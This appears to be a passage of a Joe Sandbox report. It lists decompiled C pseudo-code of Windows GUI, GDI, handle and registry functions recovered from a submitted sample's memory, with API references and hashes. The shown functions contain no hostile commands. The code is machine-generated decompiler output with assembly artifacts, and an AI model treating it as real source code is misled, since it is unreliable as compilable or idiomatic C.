                                            				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
                                            				if(_t36 == 0) {
                                            					return E00417D15(_t50, GetLastError(), 0);
                                            				}
                                            				return _t36;
                                            			}












                                            APIs
                                            • SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
                                            • GetLastError.KERNEL32(00000000), ref: 0041840B
                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
                                            • GetLastError.KERNEL32(00000000), ref: 00418425
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Time$File$ErrorLast$LocalSystem
                                            • String ID:
                                            • API String ID: 1172841412-0
                                            • Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
                                            • Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
                                            • Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
                                            • Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00427D03(void* __ecx) {
                                            				CHAR* _t35;
                                            				void* _t40;
                                            				CHAR* _t49;
                                            				CHAR* _t55;
                                            				signed int _t56;
                                            				void* _t61;
                                            
                                            				E00406520(E0042A190, _t61);
                                            				_t49 =  *(_t61 + 8);
                                            				_t55 =  *(_t61 + 0xc);
                                            				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
                                            				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
                                            				_t56 = 0 | _t55 != 0x00000001;
                                            				_t35 =  *0x436980; // 0x436994
                                            				 *(_t61 + 8) = _t35;
                                            				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
                                            				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
                                            					if(_t56 != 0) {
                                            						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
                                            					} else {
                                            						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
                                            					}
                                            					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
                                            				}
                                            				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
                                            				_t40 = E00416AEC(_t61 + 8);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
                                            				return _t40;
                                            			}










                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00427D08
                                              • Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303
                                            • wsprintfA.USER32 ref: 00427D69
                                            • wsprintfA.USER32 ref: 00427D7F
                                            • SendMessageA.USER32(?,00000362,00000000,?), ref: 00427D99
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: wsprintf$H_prologMessageSendlstrlen
                                            • String ID:
                                            • API String ID: 443212507-0
                                            • Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
                                            • Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
                                            • Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
                                            • Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                            				int _v8;
                                            				int _t21;
                                            				intOrPtr _t32;
                                            				int _t36;
                                            				void* _t46;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t46 = __ecx;
                                            				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                            				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                            				_v8 = _t21;
                                            				OffsetRect(__ecx + 0x28, _t36, _t21);
                                            				OffsetRect(_t46 + 0x48, _t36, _v8);
                                            				OffsetRect(_t46 + 0x38, _t36, _v8);
                                            				OffsetRect(_t46 + 0x58, _t36, _v8);
                                            				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                                            				 *((intOrPtr*)(_t46 + 4)) = _a4;
                                            				 *((intOrPtr*)(_t46 + 8)) = _a8;
                                            				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                                            					_t32 = E004201E2();
                                            				} else {
                                            					_t32 = 0;
                                            				}
                                            				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                                            				return E0042007A(_t46, _t48, 0);
                                            			}









                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: OffsetRect
                                            • String ID:
                                            • API String ID: 177026234-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E00422C42(void* __ecx) {
                                            				void* __ebp;
                                            				void* _t6;
                                            				void* _t8;
                                            				void* _t27;
                                            				void* _t30;
                                            				void* _t32;
                                            
                                            				_t32 = __ecx;
                                            				_t6 = E004136A7(__ecx);
                                            				if(_t6 != 0) {
                                            					if((E00416528(_t32) & 0x00000001) != 0) {
                                            						_t27 = E00414CEF(_t32);
                                            						_t30 = E00413740(_t32, GetForegroundWindow());
                                            						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
                                            							_push(1);
                                            							_pop(0);
                                            						}
                                            						asm("sbb eax, eax");
                                            						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
                                            					}
                                            					_t8 = 1;
                                            					return _t8;
                                            				}
                                            				return _t6;
                                            			}










                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetForegroundWindow.USER32 ref: 00422C66
                                            • GetLastActivePopup.USER32(?), ref: 00422C81
                                            • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00422C9D
                                            • SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 00422CBE
                                            Similarity
                                            • API ID: MessageSendWindow$ActiveForegroundLastLongPopup
                                            • String ID:
                                            • API String ID: 2039223353-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00417748(void* __ecx, void* __esi) {
                                            				void* _v8;
                                            				void* __ebp;
                                            				void* _t10;
                                            				void* _t22;
                                            				intOrPtr* _t29;
                                            				void* _t31;
                                            				void* _t34;
                                            
                                            				_t31 = __esi;
                                            				_push(__ecx);
                                            				_t22 = __ecx;
                                            				if(E004131DD(0x10) == 0) {
                                            					_t29 = 0;
                                            				} else {
                                            					_t29 = E004176E1(_t8, 0xffffffff);
                                            				}
                                            				_push(_t31);
                                            				_t10 = GetCurrentProcess();
                                            				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
                                            					if(_t29 != 0) {
                                            						 *((intOrPtr*)( *_t29 + 4))(1);
                                            					}
                                            					E00417D15(_t34, GetLastError(), 0);
                                            				}
                                            				 *((intOrPtr*)(_t29 + 4)) = _v8;
                                            				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
                                            				return _t29;
                                            			}











                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
                                            • DuplicateHandle.KERNEL32(00000000), ref: 00417785
                                            • GetLastError.KERNEL32(00000000), ref: 0041779F
                                            Similarity
                                            • API ID: CurrentProcess$DuplicateErrorHandleLast
                                            • String ID:
                                            • API String ID: 3907606552-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
                                            				struct tagPOINT _v12;
                                            				struct tagPOINT* _t8;
                                            				struct HWND__* _t9;
                                            				int _t14;
                                            				long _t18;
                                            				struct HWND__* _t21;
                                            				struct HWND__* _t22;
                                            				struct HWND__* _t24;
                                            
                                            				_t8 = _a8;
                                            				_v12.x = _t8->x;
                                            				_t18 = _t8->y;
                                            				_push(_t18);
                                            				_v12.y = _t18;
                                            				_t9 = WindowFromPoint( *_t8);
                                            				_t24 = _t9;
                                            				if(_t24 != 0) {
                                            					_t21 = GetParent(_t24);
                                            					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
                                            						ScreenToClient(_t24,  &_v12);
                                            						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
                                            						if(_t22 == 0) {
                                            							L6:
                                            							_t9 = _t24;
                                            						} else {
                                            							_t14 = IsWindowEnabled(_t22);
                                            							_t9 = _t22;
                                            							if(_t14 != 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            					} else {
                                            						_t9 = _t21;
                                            					}
                                            				}
                                            				return _t9;
                                            			}












                                            APIs
                                            • WindowFromPoint.USER32(?,?), ref: 00410C67
                                            • GetParent.USER32(00000000), ref: 00410C74
                                            • ScreenToClient.USER32 ref: 00410C95
                                            • IsWindowEnabled.USER32(00000000), ref: 00410CAE
                                              • Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A
                                            Similarity
                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
                                            • String ID:
                                            • API String ID: 2204725058-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00426CBA(intOrPtr __ecx, void* __eflags) {
                                            				void* _t21;
                                            				intOrPtr* _t32;
                                            				struct HICON__** _t40;
                                            				intOrPtr _t43;
                                            				void* _t45;
                                            
                                            				E00406520(E0042A113, _t45);
                                            				_push(__ecx);
                                            				_t43 = __ecx;
                                            				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
                                            				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
                                            				 *(_t45 - 4) = 1;
                                            				E00419BEE(__ecx + 0x78);
                                            				_t39 =  *((intOrPtr*)(_t43 + 0x114));
                                            				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
                                            					E004288AC(_t39);
                                            					E00413206(_t39);
                                            				}
                                            				E00413206( *((intOrPtr*)(_t43 + 0x88)));
                                            				_t32 =  *((intOrPtr*)(_t43 + 0x74));
                                            				if(_t32 != 0) {
                                            					 *((intOrPtr*)( *_t32 + 4))(1);
                                            				}
                                            				_t40 = _t43 + 0x100;
                                            				if( *(_t43 + 0x100) != 0) {
                                            					SetCursor(LoadCursorA(0, 0x7f00));
                                            					DestroyCursor( *_t40);
                                            				}
                                            				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
                                            				E00419C1F(_t43 + 0x78);
                                            				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
                                            				_t21 = E0041AD27(_t43);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                            				return _t21;
                                            			}









                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00426CBF
                                            • LoadCursorA.USER32 ref: 00426D29
                                            • SetCursor.USER32(00000000), ref: 00426D30
                                            • DestroyCursor.USER32(00000000), ref: 00426D38
                                              • Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
                                              • Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2
                                            Similarity
                                            • API ID: Cursor$H_prolog$DeleteDestroyLoad
                                            • String ID:
                                            • API String ID: 2398634004-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                            				void* __ebp;
                                            				struct HWND__* _t10;
                                            				void* _t12;
                                            				struct HWND__* _t16;
                                            				struct HWND__* _t17;
                                            				void* _t18;
                                            
                                            				_t16 = GetDlgItem(_a4, _a8);
                                            				if(_t16 == 0) {
                                            					L6:
                                            					_t10 = GetTopWindow(_a4);
                                            					while(1) {
                                            						_t17 = _t10;
                                            						if(_t17 == 0) {
                                            							break;
                                            						}
                                            						_t12 = E00414E0D(_t17, _a8, _a12);
                                            						if(_t12 == 0) {
                                            							_t10 = GetWindow(_t17, 2);
                                            							continue;
                                            						}
                                            						goto L11;
                                            					}
                                            					return 0;
                                            				} else {
                                            					if(GetTopWindow(_t16) == 0) {
                                            						L3:
                                            						_push(_t16);
                                            						if(_a12 == 0) {
                                            							return E00413740(_t18);
                                            						}
                                            						_t12 = E00413767();
                                            						if(_t12 == 0) {
                                            							goto L6;
                                            						}
                                            					} else {
                                            						_t12 = E00414E0D(_t16, _a8, _a12);
                                            						if(_t12 == 0) {
                                            							goto L3;
                                            						}
                                            					}
                                            				}
                                            				L11:
                                            				return _t12;
                                            			}










                                            APIs
                                            • GetDlgItem.USER32 ref: 00414E18
                                            • GetTopWindow.USER32(00000000), ref: 00414E2B
                                            • GetTopWindow.USER32(?), ref: 00414E5B
                                            • GetWindow.USER32(00000000,00000002), ref: 00414E76
                                            Similarity
                                            • API ID: Window$Item
                                            • String ID:
                                            • API String ID: 369458955-0
                                            • Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
                                            • Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
                                            • Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
                                            • Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                            				void* __ebp;
                                            				struct HWND__* _t16;
                                            				void* _t20;
                                            				void* _t22;
                                            				struct HWND__* _t24;
                                            
                                            				_t22 = __edx;
                                            				_t16 = GetTopWindow(_a4);
                                            				while(1) {
                                            					_t24 = _t16;
                                            					if(_t24 == 0) {
                                            						break;
                                            					}
                                            					if(_a24 == 0) {
                                            						SendMessageA(_t24, _a8, _a12, _a16);
                                            					} else {
                                            						_push(_t24);
                                            						_t20 = E00413767();
                                            						if(_t20 != 0) {
                                            							_push(_a16);
                                            							_push(_a12);
                                            							_push(_a8);
                                            							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                            							_push(_t20);
                                            							E0041357F(_t22);
                                            						}
                                            					}
                                            					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
                                            						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
                                            					}
                                            					_t16 = GetWindow(_t24, 2);
                                            				}
                                            				return _t16;
                                            			}









                                            APIs
                                            • GetTopWindow.USER32(?), ref: 00414E94
                                            • SendMessageA.USER32(00000000,?,?,?), ref: 00414ECA
                                            • GetTopWindow.USER32(00000000), ref: 00414ED7
                                            • GetWindow.USER32(00000000,00000002), ref: 00414EF5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend
                                            • String ID:
                                            • API String ID: 1496643700-0
                                            • Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
                                            • Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
                                            • Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
                                            • Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
                                            				intOrPtr _t16;
                                            				int _t17;
                                            				void* _t20;
                                            				struct HWND__* _t26;
                                            				intOrPtr _t35;
                                            				void* _t36;
                                            
                                            				_t37 = __ebp;
                                            				_t36 = __ecx;
                                            				_t16 =  *((intOrPtr*)(__ecx + 0xc));
                                            				if(_t16 == 0) {
                                            					if(_a4 == 0) {
                                            						_t35 =  *((intOrPtr*)(__ecx + 0x14));
                                            						if(GetFocus() ==  *(_t35 + 0x1c)) {
                                            							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
                                            							_t26 =  *(_t36 + 0x14);
                                            							if(_t26 != 0) {
                                            								_t26 =  *(_t26 + 0x1c);
                                            							}
                                            							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
                                            						}
                                            					}
                                            					_t17 = E004166CE( *(_t36 + 0x14), _a4);
                                            					L9:
                                            					 *((intOrPtr*)(_t36 + 0x18)) = 1;
                                            					return _t17;
                                            				}
                                            				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
                                            					return _t16;
                                            				}
                                            				asm("sbb ecx, ecx");
                                            				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
                                            				goto L9;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Item$EnableFocusMenuNextParent
                                            • String ID:
                                            • API String ID: 988757621-0
                                            • Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
                                            • Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
                                            • Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
                                            • Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00428D0F(intOrPtr* __ecx, int _a4) {
                                            				struct HDC__* _t8;
                                            				int _t16;
                                            				void* _t18;
                                            				void* _t21;
                                            				intOrPtr* _t22;
                                            
                                            				_t16 = _a4;
                                            				_t22 = __ecx;
                                            				_t21 = GetStockObject(_t16);
                                            				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
                                            					_t8 =  *(_t22 + 4);
                                            					if(_t8 != 0) {
                                            						SelectObject(_t8, _t21);
                                            					}
                                            					_push(SelectObject( *(_t22 + 8), _t21));
                                            					return E0041A5FC();
                                            				} else {
                                            					_push(SelectObject( *(_t22 + 8), _t21));
                                            					_t18 = E0041A5FC();
                                            					if( *(_t22 + 0x2c) != _t21) {
                                            						 *(_t22 + 0x2c) = _t21;
                                            						E00428D7F(_t22);
                                            					}
                                            					return _t18;
                                            				}
                                            			}









                                            APIs
                                            • GetStockObject.GDI32(?), ref: 00428D19
                                            • SelectObject.GDI32(?,00000000), ref: 00428D39
                                            • SelectObject.GDI32(?,00000000), ref: 00428D6B
                                            • SelectObject.GDI32(?,00000000), ref: 00428D71
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Object$Select$Stock
                                            • String ID:
                                            • API String ID: 3337941649-0
                                            • Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
                                            • Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
                                            • Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
                                            • Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                            				signed short _t21;
                                            				void* _t37;
                                            
                                            				_t37 = __ecx;
                                            				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                            					 *(_t37 + 0x90) = _a4;
                                            					 *(_t37 + 0x94) = _a8;
                                            					 *(_t37 + 0x88) = _a12;
                                            					_t21 = _a16;
                                            					 *(_t37 + 0x8c) = _t21;
                                            					return _t21;
                                            				}
                                            				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                            				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                            				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                            			}






                                            APIs
                                            • IsWindow.USER32(0000E800), ref: 004253F7
                                            • SendMessageA.USER32(0000E800,00000420,00000000,?), ref: 00425420
                                            • SendMessageA.USER32(0000E800,0000041F,00000000,?), ref: 0042543A
                                            • InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MessageSend$InvalidateRectWindow
                                            • String ID:
                                            • API String ID: 3225880595-0
                                            • Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
                                            • Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
                                            • Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
                                            • Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
                                            				char _v20;
                                            				void* _t17;
                                            				long _t19;
                                            				void* _t27;
                                            				void* _t28;
                                            
                                            				_t27 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                            					wsprintfA( &_v20, "%d", _a12);
                                            					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
                                            				}
                                            				_t17 = E00425E7D(__ecx, _a4);
                                            				_t28 = _t17;
                                            				if(_t28 != 0) {
                                            					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
                                            					RegCloseKey(_t28);
                                            					return 0 | _t19 == 0x00000000;
                                            				}
                                            				return _t17;
                                            			}









                                            APIs
                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
                                            • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
                                            • wsprintfA.USER32 ref: 0041E29D
                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ClosePrivateProfileStringValueWritewsprintf
                                            • String ID:
                                            • API String ID: 1902064621-0
                                            • Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
                                            • Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
                                            • Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
                                            • Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v16;
                                            				int _t12;
                                            				signed int _t16;
                                            				int _t18;
                                            				intOrPtr _t19;
                                            				void* _t24;
                                            				intOrPtr* _t27;
                                            
                                            				_t19 = _a4;
                                            				_t27 = __ecx;
                                            				E0041F52D(__ecx, _t19, _a8);
                                            				_t12 = E00416528(__ecx);
                                            				if((_t12 & 0x00000001) != 0) {
                                            					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                            					if(_t12 == 0) {
                                            						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
                                            						_t16 = GetSystemMetrics(5);
                                            						_t18 = GetSystemMetrics(2);
                                            						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                            						return _t18;
                                            					}
                                            				}
                                            				return _t12;
                                            			}











                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetParent.USER32(0000E800), ref: 00424FC0
                                            • IsZoomed.USER32(00000000), ref: 00424FC7
